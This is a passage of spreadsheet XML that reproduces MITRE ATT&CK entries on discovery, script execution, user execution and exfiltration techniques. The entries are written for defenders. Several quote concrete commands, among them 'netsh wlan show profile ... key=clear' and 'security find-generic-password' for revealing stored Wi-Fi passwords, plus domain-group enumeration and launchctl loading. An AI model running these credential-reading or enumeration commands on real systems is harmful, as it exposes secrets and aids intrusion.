Commands such as &lt;code&gt;net group /domain&lt;/code&gt; of the [Net](https://attack.mitre.org/software/S0039) utility,  &lt;code&gt;dscacheutil -q group&lt;/code&gt; on macOS, and &lt;code&gt;ldapsearch&lt;/code&gt; on Linux can list domain-level groups.</t>
  </si>
  <si>
    <t>T1069.001</t>
  </si>
  <si>
    <t>Permission Groups Discovery: Local Groups</t>
  </si>
  <si>
    <t>Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.
Commands such as &lt;code&gt;net localgroup&lt;/code&gt; of the [Net](https://attack.mitre.org/software/S0039) utility, &lt;code&gt;dscl . -list /Groups&lt;/code&gt; on macOS, and &lt;code&gt;groups&lt;/code&gt; on Linux can list local groups.</t>
  </si>
  <si>
    <t>T1614.001</t>
  </si>
  <si>
    <t>System Location Discovery: System Language Discovery</t>
  </si>
  <si>
    <t>Adversaries may attempt to gather information about the system language of a victim in order to infer the geographical location of that host. This information may be used to shape follow-on behaviors, including whether the adversary infects the target and/or attempts specific actions. This decision may be employed by malware developers and operators to reduce their risk of attracting the attention of specific law enforcement agencies or prosecution/scrutiny from other entities.(Citation: Malware System Language Check)
There are various sources of data an adversary could use to infer system language, such as system defaults and keyboard layouts. Specific checks will vary based on the target and/or adversary, but may involve behaviors such as [Query Registry](https://attack.mitre.org/techniques/T1012) and calls to [Native API](https://attack.mitre.org/techniques/T1106) functions.(Citation: CrowdStrike Ryuk January 2019) 
For example, on a Windows system adversaries may attempt to infer the language of a system by querying the registry key &lt;code&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Nls\Language&lt;/code&gt; or parsing the outputs of Windows API functions &lt;code&gt;GetUserDefaultUILanguage&lt;/code&gt;, &lt;code&gt;GetSystemDefaultUILanguage&lt;/code&gt;, &lt;code&gt;GetKeyboardLayoutList&lt;/code&gt; and &lt;code&gt;GetUserDefaultLangID&lt;/code&gt;.(Citation: Darkside Ransomware Cybereason)(Citation: Securelist JSWorm)(Citation: SecureList SynAck Doppelgänging May 2018)
On a macOS or Linux system, adversaries may query &lt;code&gt;locale&lt;/code&gt; to retrieve the value of the &lt;code&gt;$LANG&lt;/code&gt; environment variable.</t>
  </si>
  <si>
    <t>T1016.001</t>
  </si>
  <si>
    <t>System Network Configuration Discovery: Internet Connection Discovery</t>
  </si>
  <si>
    <t>Adversaries may check for Internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways such as using [Ping](https://attack.mitre.org/software/S0097), &lt;code&gt;tracert&lt;/code&gt;, and GET requests to websites.
Adversaries may use the results and responses from these requests to determine if the system is capable of communicating with their C2 servers before attempting to connect to them. The results may also be used to identify routes, redirectors, and proxy servers.</t>
  </si>
  <si>
    <t>T1016.002</t>
  </si>
  <si>
    <t>System Network Configuration Discovery: Wi-Fi Discovery</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems. Adversaries may use Wi-Fi information as part of [Account Discovery](https://attack.mitre.org/techniques/T1087), [Remote System Discovery](https://attack.mitre.org/techniques/T1018), and other discovery or [Credential Access](https://attack.mitre.org/tactics/TA0006) activity to support both ongoing and future campaigns.
Adversaries may collect various types of information about Wi-Fi networks from hosts. For example, on Windows names and passwords of all Wi-Fi networks a device has previously connected to may be available through `netsh wlan show profiles` to enumerate Wi-Fi names and then `netsh wlan show profile “Wi-Fi name” key=clear` to show a Wi-Fi network’s corresponding password.(Citation: BleepingComputer Agent Tesla steal wifi passwords)(Citation: Malware Bytes New AgentTesla variant steals WiFi credentials)(Citation: Check Point APT35 CharmPower January 2022) Additionally, names and other details of locally reachable Wi-Fi networks can be discovered using calls to `wlanAPI.dll` [Native API](https://attack.mitre.org/techniques/T1106) functions.(Citation: Binary Defense Emotes Wi-Fi Spreader)
On Linux, names and passwords of all Wi-Fi-networks a device has previously connected to may be available in files under ` /etc/NetworkManager/system-connections/`.(Citation: Wi-Fi Password of All Connected Networks in Windows/Linux) On macOS, the password of a known Wi-Fi may be identified with ` security find-generic-password -wa wifiname` (requires admin username/password).(Citation: Find Wi-Fi Password on Mac)
</t>
  </si>
  <si>
    <t>T1059.002</t>
  </si>
  <si>
    <t>Command and Scripting Interpreter: AppleScript</t>
  </si>
  <si>
    <t>Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.(Citation: Apple AppleScript) These AppleEvent messages can be sent independently or easily scripted with AppleScript. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.
Scripts can be run from the command-line via &lt;code&gt;osascript /path/to/script&lt;/code&gt; or &lt;code&gt;osascript -e "script here"&lt;/code&gt;. Aside from the command line, scripts can be executed in numerous ways including Mail rules, Calendar.app alarms, and Automator workflows. AppleScripts can also be executed as plain text shell scripts by adding &lt;code&gt;#!/usr/bin/osascript&lt;/code&gt; to the start of the script file.(Citation: SentinelOne AppleScript)
AppleScripts do not need to call &lt;code&gt;osascript&lt;/code&gt; to execute. However, they may be executed from within mach-O binaries by using the macOS [Native API](https://attack.mitre.org/techniques/T1106)s &lt;code&gt;NSAppleScript&lt;/code&gt; or &lt;code&gt;OSAScript&lt;/code&gt;, both of which execute code independent of the &lt;code&gt;/usr/bin/osascript&lt;/code&gt; command line utility.
Adversaries may abuse AppleScript to execute various behaviors, such as interacting with an open SSH connection, moving to remote machines, and even presenting users with fake dialog boxes. These events cannot start applications remotely (they can start them locally), but they can interact with applications if they're already running remotely. On macOS 10.10 Yosemite and higher, AppleScript has the ability to execute [Native API](https://attack.mitre.org/techniques/T1106)s, which otherwise would require compilation and execution in a mach-O binary file format.(Citation: SentinelOne macOS Red Team) Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via [Python](https://attack.mitre.org/techniques/T1059/006).(Citation: Macro Malware Targets Macs)</t>
  </si>
  <si>
    <t>T1059.009</t>
  </si>
  <si>
    <t>Command and Scripting Interpreter: Cloud API</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may abuse cloud APIs to execute malicious commands. APIs available in cloud environments provide various functionalities and are a feature-rich method for programmatic access to nearly all aspects of a tenant. These APIs may be utilized through various methods such as command line interpreters (CLIs), in-browser Cloud Shells, [PowerShell](https://attack.mitre.org/techniques/T1059/001) modules like Azure for PowerShell(Citation: Microsoft - Azure PowerShell), or software developer kits (SDKs) available for languages such as [Python](https://attack.mitre.org/techniques/T1059/006).  
Cloud API functionality may allow for administrative access across all major services in a tenant such as compute, storage, identity and access management (IAM), networking, and security policies.
With proper permissions (often via use of credentials such as [Application Access Token](https://attack.mitre.org/techniques/T1550/001) and [Web Session Cookie](https://attack.mitre.org/techniques/T1550/004)), adversaries may abuse cloud APIs to invoke various functions that execute malicious actions. For example, CLI and PowerShell functionality may be accessed through binaries installed on cloud-hosted or on-premises hosts or accessed through a browser-based cloud shell offered by many cloud platforms (such as AWS, Azure, and GCP). These cloud shells are often a packaged unified environment to use CLI and/or scripting modules hosted as a container in the cloud environment.  </t>
  </si>
  <si>
    <t>T1059.007</t>
  </si>
  <si>
    <t>Command and Scripting Interpreter: JavaScript</t>
  </si>
  <si>
    <t>Adversaries may abuse various implementations of JavaScript for execution. JavaScript (JS) is a platform-independent scripting language (compiled just-in-time at runtime) commonly associated with scripts in webpages, though JS can be executed in runtime environments outside the browser.(Citation: NodeJS)
JScript is the Microsoft implementation of the same scripting standard. JScript is interpreted via the Windows Script engine and thus integrated with many components of Windows such as the [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and Internet Explorer HTML Application (HTA) pages.(Citation: JScrip May 2018)(Citation: Microsoft JScript 2007)(Citation: Microsoft Windows Scripts)
JavaScript for Automation (JXA) is a macOS scripting language based on JavaScript, included as part of Apple’s Open Scripting Architecture (OSA), that was introduced in OSX 10.10. Apple’s OSA provides scripting capabilities to control applications, interface with the operating system, and bridge access into the rest of Apple’s internal APIs. As of OSX 10.10, OSA only supports two languages, JXA and [AppleScript](https://attack.mitre.org/techniques/T1059/002). Scripts can be executed via the command line utility &lt;code&gt;osascript&lt;/code&gt;, they can be compiled into applications or script files via &lt;code&gt;osacompile&lt;/code&gt;, and they can be compiled and executed in memory of other programs by leveraging the OSAKit Framework.(Citation: Apple About Mac Scripting 2016)(Citation: SpecterOps JXA 2020)(Citation: SentinelOne macOS Red Team)(Citation: Red Canary Silver Sparrow Feb2021)(Citation: MDSec macOS JXA and VSCode)
Adversaries may abuse various implementations of JavaScript to execute various behaviors. Common uses include hosting malicious scripts on websites as part of a [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) or downloading and executing these script files as secondary payloads. Since these payloads are text-based, it is also very common for adversaries to obfuscate their content as part of [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027).</t>
  </si>
  <si>
    <t>T1059.008</t>
  </si>
  <si>
    <t>Command and Scripting Interpreter: Network Device CLI</t>
  </si>
  <si>
    <t>Adversaries may abuse scripting or built-in command line interpreters (CLI) on network devices to execute malicious command and payloads. The CLI is the primary means through which users and administrators interact with the device in order to view system information, modify device operations, or perform diagnostic and administrative functions. CLIs typically contain various permission levels required for different commands. 
Scripting interpreters automate tasks and extend functionality beyond the command set included in the network OS. The CLI and scripting interpreter are accessible through a direct console connection, or through remote means, such as telnet or [SSH](https://attack.mitre.org/techniques/T1021/004).
Adversaries can use the network CLI to change how network devices behave and operate. The CLI may be used to manipulate traffic flows to intercept or manipulate data, modify startup configuration parameters to load malicious system software, or to disable security features or logging to avoid detection.(Citation: Cisco Synful Knock Evolution)</t>
  </si>
  <si>
    <t>T1059.001</t>
  </si>
  <si>
    <t>Command and Scripting Interpreter: PowerShell</t>
  </si>
  <si>
    <t>Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.(Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the &lt;code&gt;Start-Process&lt;/code&gt; cmdlet which can be used to run an executable and the &lt;code&gt;Invoke-Command&lt;/code&gt; cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.
A number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363),  [PowerSploit](https://attack.mitre.org/software/S0194), [PoshC2](https://attack.mitre.org/software/S0378), and PSAttack.(Citation: Github PSAttack)
PowerShell commands/scripts can also be executed without directly invoking the &lt;code&gt;powershell.exe&lt;/code&gt; binary through interfaces to PowerShell's underlying &lt;code&gt;System.Management.Automation&lt;/code&gt; assembly DLL exposed through the .NET framework and Windows Common Language Interface (CLI).(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)(Citation: Microsoft PSfromCsharp APR 2014)</t>
  </si>
  <si>
    <t>T1059.006</t>
  </si>
  <si>
    <t>Command and Scripting Interpreter: Python</t>
  </si>
  <si>
    <t>Adversaries may abuse Python commands and scripts for execution. Python is a very popular scripting/programming language, with capabilities to perform many functions. Python can be executed interactively from the command-line (via the &lt;code&gt;python.exe&lt;/code&gt; interpreter) or via scripts (.py) that can be written and distributed to different systems. Python code can also be compiled into binary executables.
Python comes with many built-in packages to interact with the underlying system, such as file operations and device I/O. Adversaries can use these libraries to download and execute commands or other scripts as well as perform various malicious behaviors.</t>
  </si>
  <si>
    <t>T1059.004</t>
  </si>
  <si>
    <t>Command and Scripting Interpreter: Unix Shell</t>
  </si>
  <si>
    <t>Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh, bash, zsh, etc.) depending on the specific OS or distribution.(Citation: DieNet Bash)(Citation: Apple ZShell) Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.
Unix shells also support scripts that enable sequential execution of commands as well as other typical programming operations such as conditionals and loops. Common uses of shell scripts include long or repetitive tasks, or the need to run the same set of commands on multiple systems.
Adversaries may abuse Unix shells to execute various commands or payloads. Interactive shells may be accessed through command and control channels or during lateral movement such as with [SSH](https://attack.mitre.org/techniques/T1021/004). Adversaries may also leverage shell scripts to deliver and execute multiple commands on victims or as part of payloads used for persistence.</t>
  </si>
  <si>
    <t>T1059.005</t>
  </si>
  <si>
    <t>Command and Scripting Interpreter: Visual Basic</t>
  </si>
  <si>
    <t>Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft)
Derivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Microsoft Office, as well as several third-party applications.(Citation: Microsoft VBA)(Citation: Wikipedia VBA) VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of [JavaScript](https://attack.mitre.org/techniques/T1059/007) on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).(Citation: Microsoft VBScript)
Adversaries may use VB payloads to execute malicious commands. Common malicious usage includes automating execution of behaviors with VBScript or embedding VBA content into [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) payloads (which may also involve [Mark-of-the-Web Bypass](https://attack.mitre.org/techniques/T1553/005) to enable execution).(Citation: Default VBS macros Blocking )</t>
  </si>
  <si>
    <t>T1059.003</t>
  </si>
  <si>
    <t>Command and Scripting Interpreter: Windows Command Shell</t>
  </si>
  <si>
    <t>Adversaries may abuse the Windows command shell for execution. The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. The command prompt can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: SSH in Windows)
Batch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops. Common uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple systems.
Adversaries may leverage [cmd](https://attack.mitre.org/software/S0106) to execute various commands and payloads. Common uses include [cmd](https://attack.mitre.org/software/S0106) to execute a single command, or abusing [cmd](https://attack.mitre.org/software/S0106) interactively with input and output forwarded over a command and control channel.</t>
  </si>
  <si>
    <t>T1559.001</t>
  </si>
  <si>
    <t>Inter-Process Communication: Component Object Model</t>
  </si>
  <si>
    <t>Adversaries may use the Windows Component Object Model (COM) for local code execution. COM is an inter-process communication (IPC) component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces.(Citation: Fireeye Hunting COM June 2019) Through COM, a client object can call methods of server objects, which are typically binary Dynamic Link Libraries (DLL) or executables (EXE).(Citation: Microsoft COM) Remote COM execution is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as  [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM).(Citation: Fireeye Hunting COM June 2019)
Various COM interfaces are exposed that can be abused to invoke arbitrary execution via a variety of programming languages such as C, C++, Java, and [Visual Basic](https://attack.mitre.org/techniques/T1059/005).(Citation: Microsoft COM) Specific COM objects also exist to directly perform functions beyond code execution, such as creating a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), fileless download/execution, and other adversary behaviors related to privilege escalation and persistence.(Citation: Fireeye Hunting COM June 2019)(Citation: ProjectZero File Write EoP Apr 2018)</t>
  </si>
  <si>
    <t>T1559.002</t>
  </si>
  <si>
    <t>Inter-Process Communication: Dynamic Data Exchange</t>
  </si>
  <si>
    <t>Adversaries may use Windows Dynamic Data Exchange (DDE) to execute arbitrary commands. DDE is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution.
Object Linking and Embedding (OLE), or the ability to link data between documents, was originally implemented through DDE. Despite being superseded by [Component Object Model](https://attack.mitre.org/techniques/T1559/001), DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry keys.(Citation: BleepingComputer DDE Disabled in Word Dec 2017)(Citation: Microsoft ADV170021 Dec 2017)(Citation: Microsoft DDE Advisory Nov 2017)
Microsoft Office documents can be poisoned with DDE commands, directly or through embedded files, and used to deliver execution via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros.(Citation: SensePost PS DDE May 2016)(Citation: Kettle CSV DDE Aug 2014)(Citation: Enigma Reviving DDE Jan 2018)(Citation: SensePost MacroLess DDE Oct 2017) Similarly, adversaries may infect payloads to execute applications and/or commands on a victim device by way of embedding DDE formulas within a CSV file intended to be opened through a Windows spreadsheet program.(Citation: OWASP CSV Injection)(Citation: CSV Excel Macro Injection )
DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). DDE execution can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM).(Citation: Fireeye Hunting COM June 2019)</t>
  </si>
  <si>
    <t>T1559.003</t>
  </si>
  <si>
    <t>Inter-Process Communication: XPC Services</t>
  </si>
  <si>
    <t>Adversaries can provide malicious content to an XPC service daemon for local code execution. macOS uses XPC services for basic inter-process communication between various processes, such as between the XPC Service daemon and third-party application privileged helper tools. Applications can send messages to the XPC Service daemon, which runs as root, using the low-level XPC Service &lt;code&gt;C API&lt;/code&gt; or the high level &lt;code&gt;NSXPCConnection API&lt;/code&gt; in order to handle tasks that require elevated privileges (such as network connections). Applications are responsible for providing the protocol definition which serves as a blueprint of the XPC services. Developers typically use XPC Services to provide applications stability and privilege separation between the application client and the daemon.(Citation: creatingXPCservices)(Citation: Designing Daemons Apple Dev)
Adversaries can abuse XPC services to execute malicious content. Requests for malicious execution can be passed through the application's XPC Services handler.(Citation: CVMServer Vuln)(Citation: Learn XPC Exploitation) This may also include identifying and abusing improper XPC client validation and/or poor sanitization of input parameters to conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).</t>
  </si>
  <si>
    <t>T1569.001</t>
  </si>
  <si>
    <t>System Services: Launchctl</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may abuse launchctl to execute commands or programs. Launchctl interfaces with launchd, the service management framework for macOS. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input.(Citation: Launchctl Man)
Adversaries use launchctl to execute commands and programs as [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s. Common subcommands include: &lt;code&gt;launchctl load&lt;/code&gt;,&lt;code&gt;launchctl unload&lt;/code&gt;, and &lt;code&gt;launchctl start&lt;/code&gt;. Adversaries can use scripts or manually run the commands &lt;code&gt;launchctl load -w "%s/Library/LaunchAgents/%s"&lt;/code&gt; or &lt;code&gt;/bin/launchctl load&lt;/code&gt; to execute [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s.(Citation: Sofacy Komplex Trojan)(Citation: 20 macOS Common Tools and Techniques)
</t>
  </si>
  <si>
    <t>T1569.002</t>
  </si>
  <si>
    <t>System Services: Service Execution</t>
  </si>
  <si>
    <t>Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (&lt;code&gt;services.exe&lt;/code&gt;) is an interface to manage and manipulate services.(Citation: Microsoft Service Control Manager) The service control manager is accessible to users via GUI components as well as system utilities such as &lt;code&gt;sc.exe&lt;/code&gt; and [Net](https://attack.mitre.org/software/S0039).
[PsExec](https://attack.mitre.org/software/S0029) can also be used to execute commands or payloads via a temporary Windows service created through the service control manager API.(Citation: Russinovich Sysinternals) Tools such as [PsExec](https://attack.mitre.org/software/S0029) and &lt;code&gt;sc.exe&lt;/code&gt; can accept remote servers as arguments and may be used to conduct remote execution.
Adversaries may leverage these mechanisms to execute malicious content. This can be done by either executing a new or modified service. This technique is the execution used in conjunction with [Windows Service](https://attack.mitre.org/techniques/T1543/003) during service persistence or privilege escalation.</t>
  </si>
  <si>
    <t>T1204.002</t>
  </si>
  <si>
    <t>User Execution: Malicious File</t>
  </si>
  <si>
    <t>An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get them to open a file that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001). Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl.
Adversaries may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036) and [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to increase the likelihood that a user will open and successfully execute a malicious file. These methods may include using a familiar naming convention and/or password protecting the file and supplying instructions to a user on how to open it.(Citation: Password Protected Word Docs) 
While [Malicious File](https://attack.mitre.org/techniques/T1204/002) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).</t>
  </si>
  <si>
    <t>T1204.003</t>
  </si>
  <si>
    <t>User Execution: Malicious Image</t>
  </si>
  <si>
    <t>Adversaries may rely on a user running a malicious image to facilitate execution. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be backdoored. Backdoored images may be uploaded to a public repository via [Upload Malware](https://attack.mitre.org/techniques/T1608/001), and users may then download and deploy an instance or container from the image without realizing the image is malicious, thus bypassing techniques that specifically achieve Initial Access. This can lead to the execution of malicious code, such as code that executes cryptocurrency mining, in the instance or container.(Citation: Summit Route Malicious AMIs)
Adversaries may also name images a certain way to increase the chance of users mistakenly deploying an instance or container from the image (ex: [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005)).(Citation: Aqua Security Cloud Native Threat Report June 2021)</t>
  </si>
  <si>
    <t>T1204.001</t>
  </si>
  <si>
    <t>User Execution: Malicious Link</t>
  </si>
  <si>
    <t>An adversary may rely upon a user clicking a malicious link in order to gain execution. Users may be subjected to social engineering to get them to click on a link that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002). Clicking on a link may also lead to other execution techniques such as exploitation of a browser or application vulnerability via [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203). Links may also lead users to download files that require execution via [Malicious File](https://attack.mitre.org/techniques/T1204/002).</t>
  </si>
  <si>
    <t>T1020.001</t>
  </si>
  <si>
    <t>Automated Exfiltration: Traffic Duplication</t>
  </si>
  <si>
    <t>Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised infrastructure. Traffic mirroring is a native feature for some devices, often used for network analysis. For example, devices may be configured to forward network traffic to one or more destinations for analysis by a network analyzer or other monitoring device. (Citation: Cisco Traffic Mirroring)(Citation: Juniper Traffic Mirroring)
Adversaries may abuse traffic mirroring to mirror or redirect network traffic through other infrastructure they control. Malicious modifications to network devices to enable traffic redirection may be possible through [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) or [Patch System Image](https://attack.mitre.org/techniques/T1601/001).(Citation: US-CERT-TA18-106A)(Citation: Cisco Blog Legacy Device Attacks)
Many cloud-based environments also support traffic mirroring. For example, AWS Traffic Mirroring, GCP Packet Mirroring, and Azure vTap allow users to define specified instances to collect traffic from and specified targets to send collected traffic to.(Citation: AWS Traffic Mirroring)(Citation: GCP Packet Mirroring)(Citation: Azure Virtual Network TAP)
Adversaries may use traffic duplication in conjunction with [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Input Capture](https://attack.mitre.org/techniques/T1056), or [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) depending on the goals and objectives of the adversary.</t>
  </si>
  <si>
    <t>T1048.002</t>
  </si>
  <si>
    <t>Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may steal data by exfiltrating it over an asymmetrically encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. 
Asymmetric encryption algorithms are those that use different keys on each end of the channel. Also known as public-key cryptography, this requires pairs of cryptographic keys that can encrypt/decrypt data from the corresponding key. Each end of the communication channels requires a private key (only in the procession of that entity) and the public key of the other entity. The public keys of each entity are exchanged before encrypted communications begin. 
Network protocols that use asymmetric encryption (such as HTTPS/TLS/SSL) often utilize symmetric encryption once keys are exchanged. Adversaries may opt to use these encrypted mechanisms that are baked into a protocol. </t>
  </si>
  <si>
    <t>T1048.001</t>
  </si>
  <si>
    <t>Exfiltration Over Alternative Protocol: Exfiltration Over Symmetric Encrypted Non-C2 Protocol</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may steal data by exfiltrating it over a symmetrically encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. 
Symmetric encryption algorithms are those that use shared or the same keys/secrets on each end of the channel. This requires an exchange or pre-arranged agreement/possession of the value used to encrypt and decrypt data. 
Network protocols that use asymmetric encryption often utilize symmetric encryption once keys are exchanged, but adversaries may opt to manually share keys and implement symmetric cryptographic algorithms (ex: RC4, AES) vice using mechanisms that are baked into a protocol. This may result in multiple layers of encryption (in protocols that are natively encrypted such as HTTPS) or encryption in protocols that not typically encrypted (such as HTTP or FTP). </t>
  </si>
  <si>
    <t>T1048.003</t>
  </si>
  <si>
    <t>Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.(Citation: copy_cmd_cisco)
Adversaries may opt to obfuscate this data, without the use of encryption, within network protocols that are natively unencrypted (such as HTTP, FTP, or DNS). This may include custom or publicly available encoding/compression algorithms (such as base64) as well as embedding data within protocol headers and fields. </t>
  </si>
  <si>
    <t>T1011.001</t>
  </si>
  <si>
    <t>Exfiltration Over Other Network Medium: Exfiltration Over Bluetooth</t>
  </si>
  <si>
    <t>Adversaries may attempt to exfiltrate data over Bluetooth rather than the command and control channel. If the command and control network is a wired Internet connection, an adversary may opt to exfiltrate data using a Bluetooth communication channel.
Adversaries may choose to do this if they have sufficient access and proximity. Bluetooth connections might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network.</t>
  </si>
  <si>
    <t>T1052.001</t>
  </si>
  <si>
    <t>Exfiltration Over Physical Medium: Exfiltration over USB</t>
  </si>
  <si>
    <t>Adversaries may attempt to exfiltrate data over a USB connected physical device. In certain circumstances, such as an air-gapped network compromise, exfiltration could occur via a USB device introduced by a user. The USB device could be used as the final exfiltration point or to hop between otherwise disconnected systems.</t>
  </si>
  <si>
    <t>T1567.004</t>
  </si>
  <si>
    <t>Exfiltration Over Web Service: Exfiltration Over Webhook</t>
  </si>
  <si>
    <t>Adversaries may exfiltrate data to a webhook endpoint rather than over their primary command and control channel. Webhooks are simple mechanisms for allowing a server to push data over HTTP/S to a client without the need for the client to continuously poll the server.(Citation: RedHat Webhooks) Many public and commercial services, such as Discord, Slack, and `webhook.site`, support the creation of webhook endpoints that can be used by other services, such as Github, Jira, or Trello.(Citation: Discord Intro to Webhooks) When changes happen in the linked services (such as pushing a repository update or modifying a ticket), these services will automatically post the data to the webhook endpoint for use by the consuming application. 
Adversaries may link an adversary-owned environment to a victim-owned SaaS service to achieve repeated [Automated Exfiltration](https://attack.mitre.org/techniques/T1020) of emails, chat messages, and other data.(Citation: Push Security SaaS Attacks Repository Webhooks) Alternatively, instead of linking the webhook endpoint to a service, an adversary can manually post staged data directly to the URL in order to exfiltrate it.(Citation: Microsoft SQL Server)
Access to webhook endpoints is often over HTTPS, which gives the adversary an additional level of protection. Exfiltration leveraging webhooks can also blend in with normal network traffic if the webhook endpoint points to a commonly used SaaS application or collaboration service.(Citation: CyberArk Labs Discord)(Citation: Talos Discord Webhook Abuse)(Citation: Checkmarx Webhooks)</t>
  </si>
  <si>
    <t>T1567.002</t>
  </si>
  <si>
    <t>Exfiltration Over Web Service: Exfiltration to Cloud Storage</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may exfiltrate data to a cloud storage service rather than over their primary command and control channel. Cloud storage services allow for the storage, edit, and retrieval of data from a remote cloud storage server over the Internet.
Examples of cloud storage services include Dropbox and Google Docs. Exfiltration to these cloud storage services can provide a significant amount of cover to the adversary if hosts within the network are already communicating with the service. </t>
  </si>
  <si>
    <t>T1567.001</t>
  </si>
  <si>
    <t>Exfiltration Over Web Service: Exfiltration to Code Repository</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may exfiltrate data to a code repository rather than over their primary command and control channel. Code repositories are often accessible via an API (ex: https://api.github.com). Access to these APIs are often over HTTPS, which gives the adversary an additional level of protection.
Exfiltration to a code repository can also provide a significant amount of cover to the adversary if it is a popular service already used by hosts within the network. </t>
  </si>
  <si>
    <t>T1567.003</t>
  </si>
  <si>
    <t>Exfiltration Over Web Service: Exfiltration to Text Storage Sites</t>
  </si>
  <si>
    <t>Adversaries may exfiltrate data to text storage sites instead of their primary command and control channel. Text storage sites, such as &lt;code&gt;pastebin[.]com&lt;/code&gt;, are commonly used by developers to share code and other information.  
